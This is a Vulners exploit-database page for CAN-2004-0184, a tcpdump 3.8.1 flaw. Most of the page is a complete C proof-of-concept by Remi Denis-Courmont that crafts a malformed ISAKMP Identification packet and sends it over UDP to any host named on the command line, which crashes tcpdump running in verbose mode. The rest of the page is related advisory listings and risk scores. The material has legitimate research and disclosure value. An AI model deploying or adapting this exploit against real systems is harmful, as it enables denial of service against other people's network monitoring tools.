Vulners
Lucene search
tcpdump ISAKMP Identification payload Integer Overflow Exploit
| Reporter | Title | Published | Views | Family All 54 |
|---|---|---|---|---|
 | Vulnerabilities of the Red Hat Linux operating system, which allow a remote attacker to compromise the confidentiality, integrity, and accessibility of protected information | 28 Apr 201500:00 | – | bdu_fstec |
| Vulnerabilities of the Red Hat Linux operating system, which allow a remote attacker to compromise the confidentiality, integrity, and accessibility of protected information | 28 Apr 201500:00 | – | bdu_fstec |
| Vulnerabilities of the Red Hat Linux operating system, which allow a remote attacker to compromise the confidentiality, integrity, and accessibility of protected information | 28 Apr 201500:00 | – | bdu_fstec |
 | CAN-2003-0108 | 6 Aug 202410:41 | – | cve |
| CAN-2004-0184 | 6 Aug 202410:11 | – | cve |
| CVE-2003-0108 | 1 Sep 200404:00 | – | cve |
| CVE-2004-0184 | 6 Apr 200404:00 | – | cve |
 | CVE-2003-0108 | 1 Sep 200404:00 | – | cvelist |
| CVE-2004-0184 | 6 Apr 200404:00 | – | cvelist |
 | [SECURITY] [DSA 255-1] New tcpdump packages fix denial of service vulnerability | 27 Feb 200320:35 | – | debian |
10
==============================================================
tcpdump ISAKMP Identification payload Integer Overflow Exploit
==============================================================
/*
* tcpdump packet sniffer
* Integer underflow in ISAKMP Identification payload
* denial of service vulnerability
* proof of concept code
* version 1.0 (Apr 02 2004)
* CVE-ID: CAN-2004-0184
*
* by Remi Denis-Courmont < exploit at simphalampin dot com >
* www simphalempin com dev
* Remi Denis-Courmont is not responsible for the misuse of the
* source code provided hereafter.
*
* This vulnerability was found by:
* Rapid7, LLC Security Advisory - www rapid7 com
* whose original advisory may be fetched from:
* www rapid7 com advisories R7-0017 html
*
* Vulnerable:
* - tcpdump 3.8.1
*
* Not vulnerable:
* - tcpdump 3.8.3
*
* NOTES:
* The vulnerability cannot be exploited to cause a denial of service
* with the Debian's tcpdump packages as it was partly fixed as part of
* the fix for earlier known CAN-2003-0108 vulnerability, though the bug
* is still present. That may be the case for other vendors which were
* not investigated.
*
* tcpdump must be run with a verbosity level of at least 3:
* # tcpdump -vvv
* Otherwise, no denial of service will occur.
*/
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netdb.h>
static const char packet[] =
/* ISAKMP header */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* Initiator cookie */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* Responder cookie */
"\x05" /* Next payload: Identification */
"\x10" /* Version: 1.0 */
"\x01" /* Exchange type */
"\x00" /* Flags */
"\x00\x00\x00\x00" /* Message ID */
"\x00\x00\x00\x24" /* Length */
/* ISAKMP Identification payload */
"\x00" /* Next payload: none */
"\x00" /* Reserved */
"\x00\x05" /* Payload length (incorrect) */
"\x20" /* ID type (unknown) */
"\x00\x00\x00" /* DOI */
;
static int
send_evil_packet (const struct addrinfo *r)
{
int fd;
size_t len;
fd = socket (r->ai_family, r->ai_socktype, r->ai_protocol);
if (fd == -1)
{
perror ("Socket error");
return 1;
}
len = sizeof (packet) - 1;
if (sendto (fd, packet, len, 0, r->ai_addr, r->ai_addrlen) != len)
{
perror ("Packet sending error");
close (fd);
return 1;
}
puts ("Packet sent!");
close (fd);
return 0;
}
static int
proof (const char *hostname)
{
struct addrinfo *res;
int check;
{
struct addrinfo help;
memset (&help, 0, sizeof (help));
help.ai_socktype = SOCK_DGRAM;
check = getaddrinfo (hostname, "isakmp", &help, &res);
}
if (check == 0)
{
struct addrinfo *ptr;
for (ptr = res; ptr != NULL; ptr = ptr->ai_next)
check |= send_evil_packet (ptr);
freeaddrinfo (res);
return check;
}
fprintf (stderr, "%s: %s\n", hostname, gai_strerror (check));
return -1;
}
static void
usage (const char *path)
{
fprintf (stderr, "Usage: %s <hostname/IP>\n", path);
}
int
main (int argc, char *argv[])
{
puts ("tcpdump Integer underflow in ISAKMP Identification payload\n"
"proof of concept code\n"
"Copyright (C) Remi Denis-Courmont 2004 "
"<\x65\x78\x70\x6c\x6f\x69\x74\x40\x73\x69\x6d\x70"
"\x68\x61\x6c\x65\x6d\x70\x69\x6e\x2e\x63\x6f\x6d>\n");
if (argc != 2)
{
usage (argv[0]);
return 2;
}
return proof (argv[1]) ? 1 : 0;
}
# 0day.today [2018-04-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Apr 2004 00:00Current
7High risk
Vulners AI Score7
EPSS0.65309